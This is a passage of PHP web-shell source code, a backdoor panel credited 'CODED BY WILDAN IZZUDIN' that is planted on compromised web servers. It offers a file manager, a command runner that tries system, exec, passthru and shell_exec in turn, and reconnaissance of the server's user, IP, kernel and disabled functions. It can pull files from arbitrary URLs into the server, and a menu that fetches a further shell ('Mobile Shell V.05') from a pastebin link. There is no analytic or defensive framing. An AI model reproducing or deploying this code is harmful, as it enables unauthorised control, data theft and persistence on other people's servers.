<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">MULTIPLE UPLOAD</td></table></div>';
if(isset($_REQUEST['ufile'])) {
$ufile = $_COEG['ufile'] ;
}
if(isset($_REQUEST['upload'])) {
if($_COEG['upload']){
if(empty($ufile)) {
    $cx = $_FILES['file']['name'];
} else {
    $cx = $ufile;
}
if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$cx)) {
success('File Uploaded !!');
} else {
error('Upload Failed !!');
          } } }
echo '<div class="coL-option"><span class="label-default">+</span> Upload From Device :<hr>';
echo '<form enctype="multipart/form-data" action="?'.x7.'upload&'.x5.$dir.'"   method="POST" style="margin:0px">
<table style="width:100%">
<td class="tup" style="width:20%">File :</td>
<td style="width:80%">
<input type="file" name="file"></td>
<tr>
<td class="tup" style="width:20%">Name :</td>
<td style="width:80%"><input name="ufile" type="text" placeholder="( Optional )" value="" /></td>
<tr>
<td style="width:20%"></td>
<td style="width:80%"><input type="submit" name="upload" style="width:100px" value="Upload" class="btn-exe" />
</td></table></form></div>';
if($_COEG["submit"]){
$url = trim($_COEG["url"]);
$uname = $_COEG["uname"];
if(empty($uname)) {
      $uname = basename($url);
} else {
      $uname = $_COEG["uname"];
}
if(op($uname, $url)) {
    success('File Uploaded !!');
} else {
    error('Failed !!');
    }
}
echo('<script language="Javascript">
        function cog(){
if(document.forms[\'import\'].url.value === "") {');
    s('Enter URL !!');
    echo('return false;
    }
}
</script>');
echo '<div class="coL-option top"><span class="label-default">+</span> Upload From Internet (Import) :<hr>';
echo '<form name="import" action="?'.x7.'upload&'.x5.$dir.'"  method="POST">';
echo '<table style="width:100%">
<td class="tup" style="width:20%">Link :</td>
<td style="width:80%"><input type="text" name="url" placeholder="https://pastebin.com/raw/M4bJJtBD" style="width:100%"></td>
<tr>
<td class="tup" style="width:20%">Name :</td>
<td style="width:80%"><input type="text" name="uname" style="width:100%" placeholder="( Optional )"></td>
<tr>
<td style="width:20%"></td><td style="width:80%"><input type="submit" name="submit" style="width:100px" value="Upload" onclick="return cog();" class="btn-exe"></td></table></form>
</div></div>';
}
elseif ($_COEG['command'] == 'system') {
function exe($ms_x) {
if(function_exists('system')) {
        @ob_start();
        @system($ms_x);
        $ms_z = @ob_get_contents();
        @ob_end_clean();
        return $ms_z;
    } elseif(function_exists('exec')) {
        @exec($ms_x,$values);
        $ms_z = "";
        foreach($values as $value) {
            $ms_z .= $result;
        } return $ms_z;
    } elseif(function_exists('passthru')) {
        @ob_start();
        @passthru($ms_x);
        $ms_z = @ob_get_contents();
        @ob_end_clean();
        return $ms_z;
    } elseif(function_exists('shell_exec')) {
        $ms_z = @shell_exec($ms_x);
        return $ms_z;
    }
}
function disk($dz) {
if($dz >= 1073741824)
return sprintf('%1.2f',$dz / 1073741824 ).' GB';
elseif($dz >= 1048576)
return sprintf('%1.2f',$dz / 1048576 ) .' MB';
elseif($dz >= 1024)
return sprintf('%1.2f',$dz / 1024 ) .' KB';
else
return $dz .' B';
}
function fuck($b_ms, $c_ms, $d_ms){
    if(strpos($b_ms, $c_ms) === FALSE) return FALSE;
    if(strpos($b_ms, $d_ms) === FALSE) return FALSE;
    $a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
    $e_ms = strpos($b_ms, $d_ms, $a_ms);
    $f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
    return $f_ms; }
if(get_magic_quotes_gpc()) {
function m_ms($n_ms) {
return is_array($n_ms) ? array_map('m_ms', $n_ms) : stripslashes($n_ms); }
$_COEG = m_ms($_COEG); }

$safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";

$disablefunc = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";

$curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";

$wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";

$perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";

$python = (exe('python --help')) ? "
<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";

$ds_men = (!empty($disablefunc)) ? "<span class='label-danger'>".$disablefunc."</span>" : "<span class='label-success'>NONE</span>";
if(!function_exists('posix_getegid')) {
    $c_us = @get_current_user();
    $c_id = @getmyuid();
    $g_c = @getmygid();
    $gr_p = "?";
} else {
    $c_id = @posix_getpwuid(posix_geteuid());
    $g_c = @posix_getgrgid(posix_getegid());
    $c_us = $c_id['name'];
    $c_id = $c_id['uid'];
    $gr_p = $g_c['name'];
    $g_c = $g_c['gid'];
}
echo '<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">SYSTEM INFORMATION</td></table></div>';
echo "<table width=100% class='table-info' cellspacing=0>
<th class=th-info style=width:120px><center>Component</center></th>
<th class=th-info><center>Arrow</center></th>
<th class=th-info break><center>Result</center></th></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Server </td><td class='td-info' align='center'>&raquo;</td>
<td class='td-info'> ".$_SERVER['SERVER_SOFTWARE']."</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
Username</td><td class='td-info' align='center'>&raquo;</td>
<td class='td-info'> ".$c_us." [".$c_id."]</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
Group</td><td class='td-info' align='center'>&raquo;</td>
<td class='td-info'>".$gr_p." [".$g_c."]</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
Server IP </td><td class='td-info' align='center'>&raquo;</td>
<td class='td-info'>".gethostbyname($_SERVER['HTTP_HOST'])."</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
Your IP </td><td class='td-info' align='center'>&raquo;</td>
<td class='td-info'> ".$_SERVER['REMOTE_ADDR']."</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
PHP Version</td><td class='td-info' align='center'>&raquo;</td>
<td class='td-info'> ".@phpversion()."</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Disk Space</td> <td class='td-info' align='center'>&raquo;</td>
<td class='td-info'>[".disk(disk_free_space("/"))."] / [".disk(disk_total_space("/"))."]</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Safe Mode</td><td class='td-info' align='center'>&raquo;</td>
<td class='td-info'> $safemode</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> MySQL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$mysql</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
Perl</td><td class='td-info' align='center'>&raquo;</td>
<td class='td-info'> $perl </td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Python</td><td class='td-info' align='center'>&raquo;</td>
<td class='td-info'>$python</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> WGET</td><td class='td-info' align='center'>&raquo;</td>
<td class='td-info'>$wget</td></tr>";
echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> CURL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$curl</td></tr>";
 if(get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
  echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td>
<td><span class='label label-success'>ON</span></tr>"; } else { echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td><td class='td-info'><span class='label label-danger'>OFF</span></td></tr>"; }
echo "</table>";
echo '<div class="coL-panel top"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">KERNEL</td></table></div>';
echo "<div class ='coL-option' style='margin-bottom:3px;padding:7px'>".php_uname()."</div>";
echo '<div class="coL-panel top"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">DISABLE FUNCTION</td></table></div>';
echo "<div class='coL-option wrap break' style='padding:7px'>".$ds_men."</div></div>";
}
elseif($_COEG['command'] == 'error') {
echo '<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">FILE MANAGER</td></table></div>';
    error('Permission Denied !!');
    echo x9;
} else {
$hc = @getcwd();
if(isset($_COEG['location']))
    @chdir($_COEG['location']);
$cwd = @getcwd();
if($os == 'win') {
    $hc = str_replace("\\", "/", $hc);
    $cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
    $cwd .= '/';

function hs($d) {
    if(function_exists("scandir")) {
        return scandir($d);
    } else {
        $dh  = opendir($d);
        while (false !== ($filename = readdir($dh)))
            $data[] = $filename;
        return $data;
    }
}
  if(!empty($_COOKIE['msv5']))
        $_COOKIE['msv5'] = @unserialize($_COOKIE['msv5']);

    if(!empty($_COEG['hcx'])) {
        switch($_COEG['hcx']) {
            case 'mkdir':
                if(!@mkdir($_COEG['p2']))
                    echo "Can't create new dir";
                break;
            case 'delete':
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                    $dh  = opendir($path);
                    while ( ($▟ = readdir($dh) ) !== false) {
                        $▟ = $path.$▟;
                        if ( (basename($▟) == "..") || (basename($▟) == ".") )
                            continue;
                        $type = filetype($▟);
                        if ($type == "dir")
                            deleteDir($▟);
                        else
                            @unlink($▟);
                    }
                    closedir($dh);
                    @rmdir($path);
                }
                if(is_array(@$_COEG['msv5']))
                    foreach($_COEG['msv5'] as $f) {
                        if($f == '..')
                            continue;
                        $f = urldecode($f);
                        if(is_dir($f))
                            deleteDir($f);
                        else
                            @unlink($f);
                    }
                break;
            case 'paste':
                if($_COOKIE['act'] == 'copy') {
                    function copy_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = @opendir($c.$s);
                            while (($f = @readdir($h)) !== false)
                                if (($f != ".") and ($f != ".."))
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                        } elseif(is_file($c.$s))
                            @copy($c.$s, $d.$s);
                    }
                    foreach($_COOKIE['msv5'] as $f)
                        copy_paste($_COOKIE['location'],$f, $GLOBALS['cwd']);
                } elseif($_COOKIE['act'] == 'move') {
                    function move_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = @opendir($c.$s);
                            while (($f = @readdir($h)) !== false)
                                if (($f != ".") and ($f != ".."))
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                        } elseif(@is_file($c.$s))
                            @copy($c.$s, $d.$s);
                    }
                    foreach($_COOKIE['msv5'] as $f)
                        @rename($_COOKIE['location'].$f, $GLOBALS['cwd'].$f);
                } elseif($_COOKIE['act'] == 'zip') {
                    if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_COEG['p2'], 1)) {
                            chdir($_COOKIE['location']);
                            foreach($_COOKIE['msv5'] as $f) {
                                if($f == '..')
                                    continue;
                                if(@is_file($_COOKIE['location'].$f))
                                    $zip->addFile($_COOKIE['location'].$f, $f);
                                elseif(@is_dir($_COOKIE['location'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
                } elseif($_COOKIE['act'] == 'unzip') {
                    if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE['msv5'] as $f) {
                            if($zip->open($_COOKIE['location'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
                } elseif($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['location']);
                    $_COOKIE['msv5'] = array_map('escapeshellarg', $_COOKIE['msv5']);
                    ex('tar cfzv ' . escapeshellarg($_COEG['p2']) . ' ' . implode(' ', $_COOKIE['msv5']));
                    chdir($GLOBALS['cwd']);
                }
                unset($_COOKIE['msv5']);
                setcookie('msv5', '', time() - 3600);
                break;
            default:
                if(!empty($_COEG['hcx'])) {
                    vb('act', $_COEG['hcx']);
                    vb('msv5', serialize(@$_COEG['msv5']));
                    vb('location', @$_COEG['location']);
                }
                break;
        }
    }
echo('<script>function m1s(){
if(document.getElementById("act").value == ""){');
   s('Select Action !!');
    echo('  return false;
    }
    document.getElementById("sks").submit();
  }
</script>');
echo('<form name="data" action="?dir='.$dir.'" method="POST" style="margin:0px">');
echo('<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">FILE MANAGER</td></table></div>');

    $dirContent = hs(isset($_COEG['location'])?$_COEG['location']:$GLOBALS['cwd']);
    if($dirContent === false) {
        echo('<script>c("?'.x7.'error&'.x5.$dir.'");</script>');
return;
}
    global $sort;
    $sort = array('name', 1);
    if(!empty($_COEG['hcx'])) {
        if(preg_match('!s_([A-z]+)_(\d{1})!', $_COEG['hcx'], $match))
            $sort = array($match[1], (int)$match[2]);
    }
echo('<script language="JavaScript">
function toggle(source) {
  checkboxes = document.getElementsByName("msv5[]");
  for(var i=0, n=checkboxes.length;i<n;i++) {
    checkboxes[i].checked = source.checked;
  }
}
</script>');
echo('<table class="table-file" cellspacing="0">
<th class="th-file">Name</th>
<th class="th-file" style="width:80px">Size</th>
<th class="th-file" style="width:65px">Action</th>
<th class="th-file"></th>
<tr>');
$dir = getcwd();
$scn = scandir($dir);
        foreach($scn as $dirx) {
        $dtype = filetype("$dir/$dirx");
 if(!is_dir("$dir/$dirx")) continue;
            if($dirx === '..') {
                $href = '<a class="a" onclick=\'c("?'.x5.dirname($dir).'")\'>'.$dirx.'</a>';
            }
elseif($dirx === '.') {
                $href = '<a class="a" onclick=\'c("?'.x5.$dir.'")\'>'.$dirx.'</a>';
            } else {
                $href = '<a class="a" onclick=\'c("?dir='.$dir.'/'.$dirx.'")\'>'.$dirx.'</a>';
            }
            if($dirx === '.' || $dirx === '..') {
                $d_zx = "<font color='#ddd'>--</font>";
                $ckh = '<input type="checkbox" disabled>';
            } else {
                $d_zx = '<a class="a" onclick=\'c("?'.x7.'upload&'.x5.$dir.'/'.$dirx.'")\'>U</a> |
 <a class="a" onclick=\'c("?'.x7.'renadir&'.x5.$dir.'/'.$dirx.'")\'>R</a> | <a class="a" onclick=\'c("?'.x7.'deledir&'.x5.$dir.'/'.$dirx.'")\'>D</a>';
                $ckh = '<input type="checkbox" value="'.basename($dirx).'" name="msv5[]">';
            }
 echo "<tr class='ex-hov'>";
            echo "<td class='td-file break'><i class='fa fa-folder-o'></i>&nbsp;[ $href
]</td>";
    echo "<td align='center' class='td-file'><center>--</center></th>";
    echo "<td align='center' class='td-file'>$d_zx</td>";
    echo "<td align='center' class='td-file' style='width:10px'>".$ckh."</td>";
        }
        echo "</tr>";
foreach($scn as $file) {
            $ftype = filetype("$dir/$file");
            $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
            $size = filesize("$dir/$file")/1024;
            $size = round($size,3);
            if($size > 1024) {
                $size = round($size/1024,2). 'MB';
            } else {
                $size = $size. 'KB';
            }
            if(!is_file("$dir/$file")) continue;
            echo "<tr class='ex-hov'>";
            echo '<td class=\'td-file break\'><i class="fa fa-file-o"></i>&nbsp;<a class="a" onclick="c(\'?'.x7.'view&'.x5.$dir.'&'.x6.$dir.'/'.$file.'\')">'.$file.'</a></td>';
            echo "<td align='center' class='td-file'>$size</td>";
            echo "<td align='center' class='td-file'>";
            echo '<a class="a" onclick=\'c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$file.'")\'>OPEN</a></td>';
            echo("<td align='center' class='td-file' style='width:10px'><input type='checkbox' name='msv5[]' value='".$file."'> </td>");
}
    echo("</table><table style='width:100%;margin-top:2px' cellspacing='0'>
<td style='width:10%;text-align:left;padding-left:7px'><input type=checkbox onClick=toggle(this)></td>
    <input type=hidden name=ne value=''>
    <input type=hidden name=location value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
    <input type=hidden name=charset value='". (isset($_COEG['charset'])?$_COEG['charset']:'')."'>
    <td style='width:70%'><select name='hcx' style='width:100%' id='act'>");
 if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']))
    echo("<option value='paste'>Paste</option>");
    echo("<option value=''>-- Select Action --</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>");
if(class_exists('ZipArchive'))
    echo("<option value='zip'>Compress (.zip)</option>");
    echo("</select></td>");
    if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
    echo("<input class='top' type=text name=p2 value='".rand(0,100)."-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>");
    echo("<td style='width:20%;text-align:right'><button type='submit' onclick='m1s(); return false;' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></form></table>");
   if(isset($_COEG['ndir'])) {
    $cdir = $_COEG['newinput'];
    if (is_dir($dir.'/'.$cdir)) {
error('Directory Already Exist !!');
    } else {
        if(mkdir($dir.'/'.$cdir, 0777)) {
    echo('<script>c("?'.x5.$dir.'");</script>');;
        } else {
error('Can\'t Create Directory !!');  } } }
if(isset($_COEG['nfil'])) {
    $cfile = $_COEG['newinput'];
    if (file_exists($dir.'/'.$cfile)) {
  error('File Already Exist !!');
    } else {
        if(fopen($dir.'/'.$cfile, "w+")) {
      echo('<script>c("?'.x7.'edit&'.x5.$dir.'&'.x6.$dir.'/'.$cfile.'");</script>');
        } else {
error('Can\'t Create File !!');
        }
    }
}
echo('<script language="Javascript">
        function cog(){
if(document.forms[\'new\'].newinput.value === "") {');
    s('Can\'t Be Empty !!');
    echo('return false;
    }
}
</script>');
echo('<script type="text/javascript">
function valid(field) {
        var re = /^[0-9-A-z.]*$/;
        if (!re.test(field.value)) {');
            s('Invalid Name !!');
            echo('field.value = field.value.replace(/[^0-9-A-z.]/g,"");
        }
    }
</script>');
    echo('<table style="margin-top:3px" cellspacing="0"><form name="new" action="?'.x5.$dir.'" method="post">
    <td>
<input type="text" name="newinput" onkeyup="valid(this);"></td>
<td><button type="submit" class="btn-exe" name="ndir" onclick="return cog();"><i class="fa fa-folder-o"></i></button></td>
<td><button type="submit" class="btn-exe" name="nfil" onclick="return cog();"><i class="fa fa-file-o"></i></button></td></form></table></div>');
}
echo('<div class="coR">
           <div class="coR-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">TOOLS</td></table></div><div class="tools-content">');
$path = getcwd();
if(isset($_FILES['data'])) {
if(copy($_FILES['data']['tmp_name'],$path.'/'.$_FILES['data']['name'])) {
    success('File Uploaded !!');
    mtr('?'.x5.$dir);
} else {
    error('Upload Failed !!');
    }
}
echo '<script>function upload(){
if(document.getElementById("up").value == ""){';
      s('Select Your File !!');
   echo('return false;
    }
    document.getElementById("%").submit();
  }
</script>');
echo('<table><td align="center" valign="top" style="width:10%;padding-top:11px"><i class="fa fa-bookmark-o"></i></td><td style="width:70%"><form enctype="multipart/form-data" action="?'.x5.$dir.'" method="POST"><input type="file" name="data" id="up"></td><td style="width:20%" valign="top"><button type="submit" class="btn-exe" onclick="upload();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>');
if(isset($_COEG['x'])) {
$rse = $_COEG['file_name'];
$zip = new ZipArchive ;
if($zip ->open($path.'/'.$rse) === TRUE) {
$zip ->extractTo($path);
$zip ->close();
    success('[ '.$rse.' ] Extracted !!');
    mtr('?'.x5.$dir);
} else {
    error('Permission Denied !!');
    }
}
echo('<script>function unzip(){
if(document.getElementById("u").value == ""){');
      s('Select File [.zip] !!');
   echo('return false;
    }
    document.getElementById("sks").submit();
  }
</script>');
echo '<table>
<form method="POST" action="?'.x5.$dir.'">
<td align="center" style="width:10%"><i class="fa fa-bookmark-o"></i></td>
<td style="width:70%"><select name="file_name" id="u">
<option value=""> -- Choose File --</option>';
$scandir = scandir($path);
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
if(preg_match('/\.zip$/mis',$file)) {
echo '<option>'.$file.'</option>';
    }
}
echo '</select></td><td style="width:20%;text-align:right"><button type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';

echo('</div>');
echo('<div class="coR-panel top"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">MENU</td></table></div>
<div class="tools-content">');
echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">System Information</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'system&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multiple Upload</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'upload&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Change Password</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'change&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Me : [ <font color="lime">'.str_replace('/', '', basename($_SERVER['PHP_SELF'])).' </font> ]</td><td class="td-tools-icon"><a onclick=\'c("?'.x7.'kill&'.x5.$dir.'")\'><button class="btn-exe"><i class="fa fa-trash"></i></button></a></td></table></div>');
echo('<script>function create(){
if(document.getElementById("c").value == ""){');
   s('Select Action !!');
    echo('return false;
    }
    document.getElementById("sks").submit();
  }
</script>');
if($_COEG['op']=="1") {
    if(op('adminer.php', 'https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php')) {
        success('Ok !!');
        mtr('?'.x5.$dir);
} else {
        error('Failed !!');
    }
}
if($_COEG['op']=="2") {
    if(op('v5.php', 'https://pastebin.com/raw/bPkG4jvE')) {
        success('Done !!');
        mtr('?'.x5.$dir);
} else {
        error('Failed !!');
    }
}
echo('<div class="tools-content top" style="padding:5px">');
echo('<table>
<form action="?'.x5.$dir.'" method="POST"><td align="center" style="width:10%"><i class="fa fa-bookmark-o"></span></td>
<td style="width:70%"><select name="op" id="c">');
echo('<option value=""> -- Choose File --</option>');
echo('<option value="1">MySQL [ adminer.php ]</option>');
echo('<option value="2">Mobile Shell V.05 [ v5.php ]</option>');
echo('</select></td>
<td style="width:20%;text-align:right"><button type="submit" class="btn-exe" onclick="create();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>
</div>');
echo('</div></div></div><div class="top"><div class="footer">CODED BY WILDAN IZZUDIN</div></div>');
?>